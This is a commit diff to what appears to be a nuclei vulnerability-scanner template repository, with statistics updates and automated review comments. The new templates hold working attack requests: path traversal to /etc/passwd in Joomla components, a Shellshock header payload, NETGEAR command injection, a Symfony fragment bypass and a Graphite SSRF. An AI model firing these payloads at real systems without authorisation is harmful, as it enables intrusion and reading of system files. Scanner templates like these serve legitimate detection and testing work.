commit
d01835f36f
@ -32,4 +32,5 @@ jobs:
- name: Template Validation
|
||||
run: |
|
||||
nuclei -validate -t . -exclude .pre-commit-config.yaml
|
||||
nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
|
||||
shell: bash
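Review bot: The new `nuclei -validate -w ./workflows` line shares one `run: |` step with the template validation above it, and GitHub Actions runs `shell: bash` steps with `-e`, so a failing template validation stops the step before the workflow validation ever runs and a contributor sees only the first failure. Splitting the two commands into separate named steps (`Template Validation` and `Workflow Validation`) reports both results from a single CI run. The enclosing `jobs:` block starts outside the hunk.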
22
README.md
22
README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
||||
|
||||
**146 directories, 1962 files**.
|
||||
**147 directories, 1989 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
1437
TEMPLATES-STATS.md
1437
TEMPLATES-STATS.md
20
TOP-10.md
20
TOP-10.md
@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 |
|
||||
| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 |
|
||||
| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 |
|
||||
| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | |
|
||||
| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 189 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | |
|
||||
| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | |
|
||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
||||
@ -0,0 +1,26 @@
id: CVE-2010-1219
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
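Review bot: `id: CVE-2010-1219` is followed directly by `info:` on the next line, while every sibling template added in this commit (CVE-2010-1304 through CVE-2010-2122) separates `id:` from `info:` with a blank line; adding the blank line keeps the thirteen new Joomla templates uniform. They otherwise share the same `regex` + `status` matcher block, so any later adjustment to that block should be applied to all of them in one pass.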
@ -0,0 +1,27 @@
id: CVE-2010-1304
|
||||
|
||||
info:
|
||||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1305
|
||||
|
||||
info:
|
||||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1307
|
||||
|
||||
info:
|
||||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1313
|
||||
|
||||
info:
|
||||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
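Review bot: The `name:` line says "Saber Cart" while the `description:` line and the `option=com_sebercart` parameter on the `path:` line both say Seber Cart, so the template title misspells the component it checks; `name: Joomla! Component Seber Cart 1.0.0.12 - Local File Inclusion` matches the rest of the file and the reports nuclei will emit.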
@ -0,0 +1,27 @@
id: CVE-2010-1354
|
||||
|
||||
info:
|
||||
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12102
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1354
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1470
|
||||
|
||||
info:
|
||||
name: Joomla! Component Web TV 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12166
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1470
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1476
|
||||
|
||||
info:
|
||||
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12150
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1476
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1494
|
||||
|
||||
info:
|
||||
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12113
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1494
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1717
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12291
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1717
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1980
|
||||
|
||||
info:
|
||||
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12085
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-1981
|
||||
|
||||
info:
|
||||
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12087
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1981
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
@ -0,0 +1,27 @@
id: CVE-2010-2122
|
||||
|
||||
info:
|
||||
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12623
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2122
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
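Review bot: The `description:` line describes inclusion via the `controller` parameter, but the request on the `path:` line targets `task=download&fileid=`, and the `name:` line calls the issue file disclosure rather than inclusion, so a reader comparing the two cannot tell which behaviour the matcher confirms. Presumably the path follows the exploit-db reference; one added sentence, `This template reads /etc/passwd through the fileid parameter of the download task.`, would reconcile the description with the request it documents.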
@ -24,6 +24,7 @@ requests:
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -25,11 +25,14 @@ requests:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
@ -0,0 +1,27 @@
id: CVE-2015-4050
|
||||
|
||||
info:
|
||||
name: ESI unauthorized access
|
||||
author: ELSFA7110,meme-lord
|
||||
severity: high
|
||||
description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
|
||||
tags: cve,cve2015,symfony,rce
|
||||
reference:
|
||||
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Credits"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
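Review bot: `name: ESI unauthorized access` names neither the product nor the version range that the `description:` line spells out, unlike most templates in this commit whose names begin with the product; `name: Symfony 2.3.19 - 2.6.7 - ESI Unauthorized Access` would make the finding self-describing in a report. `tags:` is also placed before `reference:` here, whereas the Joomla templates added in the same commit list `reference:` first.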
@ -0,0 +1,22 @@
id: CVE-2015-5461
|
||||
|
||||
info:
|
||||
name: StageShow <= 5.0.8 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-5461
|
||||
tags: redirect,cve,cve2015,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
@ -0,0 +1,27 @@
id: CVE-2016-6277
|
||||
|
||||
info:
|
||||
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
|
||||
tags: cve,cves2016,netgear,rce,iot
|
||||
reference:
|
||||
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
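Review bot: The `tags:` line uses `cves2016`, which breaks the `cve<year>` tag convention every other template in this commit follows (`cve2010`, `cve2015`, `cve2017`, …) and that the README tag table counts, so a `-tags cve2016` run would silently skip this template; `tags: cve,cve2016,netgear,rce,iot` fixes it.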
@ -89,7 +89,7 @@ requests:
- welcome
|
||||
|
||||
attack: sniper
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -0,0 +1,24 @@
id: CVE-2017-18638
|
||||
|
||||
info:
|
||||
name: Graphite 'graphite.composer.views.send_email' SSRF
|
||||
author: huowuzhao
|
||||
severity: high
|
||||
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
|
||||
reference:
|
||||
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
|
||||
- https://github.com/graphite-project/graphite-web/issues/2008
|
||||
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
|
||||
tags: cve,cve2017,graphite,ssrf,oob
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/wp-json/wp/v2/users/"
|
||||
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
@ -33,8 +34,9 @@ requests:
- '"name":'
|
||||
- '"avatar_urls":'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '"name":"[^"]*"'
|
||||
- '"name":"[^"]*"'
|
||||
@ -4,6 +4,7 @@ info:
name: WordPress Plugin Localize My Post 1.0 - LFI
|
||||
author: 0x_Akoko,0x240x23elu
|
||||
severity: high
|
||||
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/45439
|
||||
tags: wordpress,cve2018,cve,lfi
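Review bot: `reference:` on the line above `tags:` is a bare scalar, while every other template touched in this commit writes it as a list (`reference:` followed by `- https://…` items); keeping the list form here means tooling that iterates references sees one shape everywhere. The two-line replacement is `reference:` and `  - https://www.exploit-db.com/exploits/45439`. The `info:` block starts outside the hunk.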
|
||||
|
||||
@ -0,0 +1,30 @@
id: CVE-2018-8719
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/44371
|
||||
- https://vuldb.com/?id.115817
|
||||
- https://www.cvedetails.com/cve/CVE-2018-8719/
|
||||
tags: wordpress,wp-plugin,cve,cve2018,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "[TXT]"
|
||||
- ".log"
|
||||
- "Index of"
|
||||
condition: and
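Review bot: The word matcher on the `words:` lines requires `[TXT]` together with `Index of` and `.log`, and `[TXT]` is the icon alt text of Apache's mod_autoindex listing; a listing served by another web server would presumably leave the log files exposed but unmatched, so this check looks Apache-only. Either a comment above `matchers:` saying so, or keeping only `.log` and `Index of`, would make the coverage explicit. The `description:` line also ends without a period.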
@ -18,7 +18,6 @@ requests:
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "phpmyadmin.net"
|
||||
@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/web/static/c:/windows/win.ini"
|
||||
- "{{BaseURL}}/base/static/c:/windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -4,7 +4,10 @@ info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||
- https://www.cybersecurity-help.cz/vdb/SB2019041819
|
||||
tags: cve,cve2019,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
@ -20,7 +20,7 @@ requests:
ids: helpers/wordlists/numbers.txt
|
||||
attack: sniper
|
||||
threads: 50
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
@ -0,0 +1,30 @@
id: CVE-2019-17503
|
||||
|
||||
info:
|
||||
name: Kirona Dynamic Resource Scheduling - information disclosure
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47498
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17503
|
||||
tags: cve,cve2019,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/osm/REGISTER.cmd"
|
||||
- "{{BaseURL}}/osm_tiles/REGISTER.cmd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DEBUGMAPSCRIPT=TRUE"
|
||||
- "@echo off"
|
||||
condition: and
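Review bot: The `description:` line reads "directly _ it contains sensitive information", where the underscore looks like a dash lost in copying and the sentence never ends; `description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly; it contains sensitive information about the database through the SQL queries within this batch file.` reads cleanly.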
@ -8,6 +8,8 @@ info:
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||
- https://www.exploit-db.com/exploits/46537
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
@ -17,7 +19,6 @@ requests:
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
